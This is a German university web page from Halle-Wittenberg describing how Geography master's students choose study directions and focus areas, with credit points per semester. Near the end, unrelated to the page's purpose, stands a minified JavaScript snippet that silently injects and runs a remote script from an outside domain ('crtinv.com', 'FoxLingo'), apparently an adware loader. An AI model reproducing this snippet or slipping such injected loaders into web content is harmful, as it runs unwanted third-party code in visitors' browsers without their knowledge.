Martin-Luther-Universität Halle-Wittenberg

Weiteres

Login für Redakteure

Generelle Bestimmungen zur Schwerpunktbildung

Der Master-Studiengang folgt in seiner Studienorganisation einer stufenweisen Qualifizierung und Spezialisierung (Auszug aus der FStPOM Geographie).

Gemäß §§ 3 Abs. 3 f und 7 Abs. 3 ff der FStPOM Geographie wird nach einer breiten Einführung im 1. Semester ab dem 2. Semester eine der folgenden generellen Studienrichtungen gewählt:

  • Humanwissenschaftliche Ausrichtung
  • Naturwissenschaftliche Ausrichtung

Eine konkrete Schwerpunktbildung erfolgt ab dem 2. Semester in zwei der folgenden Bereiche im Umfang von jeweils insgesamt 10 Leistungspunkten:

  • Wirtschafts- und Sozialgeographie
  • Geoökologie / Physische Geographie
  • Nachhaltige Raumentwicklung
  • Geospatial Data Handling

Die Schwerpunkte können individuell gewählt werden, wobei als ein Schwerpunkt entweder „Wirtschafts- und Sozialgeographie“ oder „Geoökologie/ Physische Geographie“ gewählt werden soll. Wird als einer der Schwerpunkte „Wirtschafts- und Sozialgeographie“ gewählt, ergibt sich die generelle humanwissenschaftliche Ausrichtung, wird als einer der Schwerpunkte „Geoökologie/ Physische Geographie“ gewählt, ergibt sich die naturwissenschaftliche Ausrichtung.

Im dritten Semester wird die Schwerpunktbildung mit 10 Leistungspunkten in einem der gewählten Studienschwerpunkte beibehalten (Studienschwerpunkt I), während der gewählte Studienschwerpunkt II mit 5 Leistungspunkten belegt wird. Gleichzeitig wird das erworbene Wissen in einer zusätzlichen Geländeübung (5 Leistungspunkte) praktisch vertieft. Das vierte Semester ist der Anfertigung der Master-Arbeit im Studienschwerpunkt I und ihrer Verteidigung vorbehalten.

Wird der Studienschwerpunkt „Nachhaltige Raumentwicklung“ als Studienschwerpunkt II gewählt, ist für die Vertiefung im 2. und 3. Semester das Modul „Projekt“ obligatorisch.

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

Zum Seitenanfang